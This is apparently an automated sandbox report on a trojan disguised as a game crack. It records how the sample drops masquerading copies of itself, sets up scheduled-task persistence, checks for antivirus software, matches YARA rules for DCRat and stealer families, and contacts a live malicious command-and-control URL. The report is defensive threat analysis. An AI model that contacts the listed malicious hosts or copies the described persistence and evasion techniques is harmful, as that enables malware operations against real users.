Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Queries volume information: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe VolumeInformation
Source: C:\Program Files\Windows NT\smss.exe	Queries volume information: C:\Program Files\Windows NT\smss.exe VolumeInformation
Source: C:\Program Files\Windows NT\smss.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files\Windows NT\smss.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows NT\smss.exe	Queries volume information: C:\Program Files\Windows NT\smss.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001DDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_001DDF1E

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001CB146 GetVersionExW,

0_2_001CB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: smss.exe, 00000032.00000002.2204521543.000000001BEB1000.00000004.00000020.00020000.00000000.sdmp, smss.exe, 00000032.00000002.2197047875.000000001BE98000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Program Files\Windows NT\smss.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files\Windows NT\smss.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 5.2.BlockcontainerWin.exe.13585ce8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BlockcontainerWin.exe PID: 7932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smss.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smss.exe PID: 5888, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: NursultanAlphaCrack.bat.exe, type: SAMPLE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.BlockcontainerWin.exe.fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1360056049.00000000075E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1358955428.0000000006CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1428074698.0000000000FD2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows NT\smss.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, type: DROPPED
Source: Yara match	File source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: NursultanAlphaCrack.bat.exe, type: SAMPLE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.BlockcontainerWin.exe.fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows NT\smss.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, type: DROPPED
Source: Yara match	File source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 5.2.BlockcontainerWin.exe.13585ce8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BlockcontainerWin.exe PID: 7932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smss.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: smss.exe PID: 5888, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: NursultanAlphaCrack.bat.exe, type: SAMPLE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.BlockcontainerWin.exe.fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1360056049.00000000075E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1358955428.0000000006CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1428074698.0000000000FD2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows NT\smss.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, type: DROPPED
Source: Yara match	File source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: NursultanAlphaCrack.bat.exe, type: SAMPLE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.BlockcontainerWin.exe.fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows NT\smss.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe, type: DROPPED
Source: Yara match	File source: C:\portsurrogateFontCrt\BlockcontainerWin.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	241 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	57 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	Login Hook	Login Hook	1 Software Packing	NTDS	261 Security Software Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	113 Masquerading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NursultanAlphaCrack.bat.exe	73%	Virustotal		Browse
NursultanAlphaCrack.bat.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
NursultanAlphaCrack.bat.exe	100%	Avira	VBS/Runner.VPG
NursultanAlphaCrack.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\EErUokRe.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files\Windows NT\smss.exe	100%	Avira	TR/Spy.Agent.dbxid
C:\Users\user\Desktop\BAOTDPUV.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	100%	Avira	TR/Spy.Agent.dbxid
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	100%	Avira	TR/Spy.Agent.dbxid
C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	100%	Avira	TR/Spy.Agent.dbxid
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	100%	Avira	TR/Spy.Agent.dbxid
C:\Users\user\Desktop\BOAdhoQl.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\EErUokRe.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\JRLLnIaC.log	100%	Joe Sandbox ML
C:\Program Files\Windows NT\smss.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows NT\smss.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BAOTDPUV.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BOAdhoQl.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BwtLSSWj.log	25%	ReversingLabs
C:\Users\user\Desktop\DYilKdVO.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\EErUokRe.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\JDNtgNEK.log	29%	ReversingLabs
C:\Users\user\Desktop\JRLLnIaC.log	8%	ReversingLabs
C:\Users\user\Desktop\OfbStevG.log	29%	ReversingLabs
C:\Users\user\Desktop\Rfxshdov.log	25%	ReversingLabs
C:\Users\user\Desktop\USBzXUek.log	12%	ReversingLabs
C:\Users\user\Desktop\VlKreyqd.log	5%	ReversingLabs
C:\Users\user\Desktop\ZFTyARuY.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\ZTFIdpqp.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\blWilNVX.log	12%	ReversingLabs
C:\Users\user\Desktop\gDHycgoN.log	11%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\kHvGrYKy.log	29%	ReversingLabs
C:\Users\user\Desktop\lhCxVqkE.log	25%	ReversingLabs
C:\Users\user\Desktop\medFrqzz.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\npqXqOLK.log	11%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\oCwXyDAs.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\qmbOMItv.log	8%	ReversingLabs
C:\Users\user\Desktop\rEjFTmFn.log	11%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\rfhNxLLD.log	5%	ReversingLabs
C:\Users\user\Desktop\sXGeTWEn.log	5%	ReversingLabs
C:\Users\user\Desktop\ssnNFABl.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\uQMeEZWw.log	12%	ReversingLabs
C:\Users\user\Desktop\wSzMZIas.log	8%	ReversingLabs
C:\portsurrogateFontCrt\BlockcontainerWin.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://237025cm.n9shteam.in	100%	Avira URL Cloud	malware
http://237025cm.n9shteam.in/UpdatesqlCdn.php	100%	Avira URL Cloud	malware
http://237025cm.n9shteam.in/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
237025cm.n9shteam.in	104.21.80.1	true	true	unknown
s-part-0017.t-0009.fb-t-msedge.net	13.107.253.45	true	false	high
171.39.242.20.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://237025cm.n9shteam.in/UpdatesqlCdn.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000018.00000002.1624574475.0000023D2C6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E3A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://237025cm.n9shteam.in	GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.00000000035AA000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000018.00000002.1624574475.0000023D2C6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16D08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E3A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000018.00000002.2983617268.0000023D3C516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2984347585.000002C598DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2966511703.000001FE26B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000001D.00000002.2776439903.0000019F90077000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000018.00000002.1624574475.0000023D2C4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E37F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7C61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BlockcontainerWin.exe, 00000005.00000002.1496547817.0000000003B68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1624574475.0000023D2C4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1624440544.000002C588D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1623450496.000001FE16AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1611859711.0000019F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1629527995.00000212E37F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1630582447.000001DBD7C61000.00000004.00000800.00020000.00000000.sdmp, GKcQVcpwHdHgqKNzncXgLOYQsT.exe, 00000026.00000002.2018322242.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000021.00000002.1630582447.000001DBD7E87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://237025cm.n9shteam.in/	smss.exe, 00000032.00000002.1657980765.0000000003358000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.80.1	237025cm.n9shteam.in	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590001
Start date and time:	2025-01-13 13:15:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	67
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	NursultanAlphaCrack.bat.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@58/78@3/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, RuntimeBroker.exe, smss.exe, SIHClient.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 4.175.87.197, 20.242.39.171, 20.109.210.53
Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target BlockcontainerWin.exe, PID 7932 because it is empty
Execution Graph export aborted for target smss.exe, PID 5888 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:16:59	API Interceptor	173x Sleep call for process: powershell.exe modified
07:17:13	API Interceptor	1x Sleep call for process: smss.exe modified
07:17:21	API Interceptor	1x Sleep call for process: GKcQVcpwHdHgqKNzncXgLOYQsT.exe modified
12:16:57	Task Scheduler	Run new task: BlockcontainerWin path: "C:\portsurrogateFontCrt\BlockcontainerWin.exe"
12:16:57	Task Scheduler	Run new task: BlockcontainerWinB path: "C:\portsurrogateFontCrt\BlockcontainerWin.exe"
12:16:57	Task Scheduler	Run new task: GKcQVcpwHdHgqKNzncXgLOYQsT path: "C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe"
12:16:57	Task Scheduler	Run new task: GKcQVcpwHdHgqKNzncXgLOYQsTG path: "C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe"
12:16:58	Task Scheduler	Run new task: RuntimeBroker path: "C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe"
12:16:58	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe"
12:16:59	Task Scheduler	Run new task: smss path: "C:\Program Files\Windows NT\smss.exe"
12:16:59	Task Scheduler	Run new task: smsss path: "C:\Program Files\Windows NT\smss.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.80.1	QsBdpe1gK5.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.masterqq.pro/vfw3/
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.aziziyeescortg.xyz/2pcx/
	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/0hqe/
	6uHfmjGMfL.exe	Get hash	malicious	Amadey	Browse	clientservices.sgoogleapis.observer/api/index.php
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26desusertion%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.fb-t-msedge.net	https://sites.google.com/view/01-25sharepoint/	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	YYYY-NNN AUDIT DETAIL REPORT .docx	Get hash	malicious	Unknown	Browse	13.107.253.45
	setup64v.2.9.7.msi	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.com	Get hash	malicious	Unknown	Browse	13.107.253.45
	17367113452957edfc9b8ae3ec34b8a6a9089df6f896f271bbf1399203c8025fd6cb0731fa872.dat-decoded.exe	Get hash	malicious	Unknown	Browse	13.107.253.45
	VlY57c5AF4.exe	Get hash	malicious	Unknown	Browse	13.107.253.45
	wN7EPNiHSM.exe	Get hash	malicious	FormBook	Browse	13.107.253.45
	http://infarmbureau.com	Get hash	malicious	Unknown	Browse	13.107.253.45
	32474162872806629906.js	Get hash	malicious	Strela Downloader	Browse	13.107.253.45
	0Ie2kYdPTW.exe	Get hash	malicious	FormBook	Browse	13.107.253.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	recode.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.16.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	RFQ PC25-1301 Product Specifications_PDF.exe	Get hash	malicious	FormBook	Browse	104.21.80.156
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	104.19.132.76
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	https://smartbooking.ma/	Get hash	malicious	Unknown	Browse	188.114.97.3
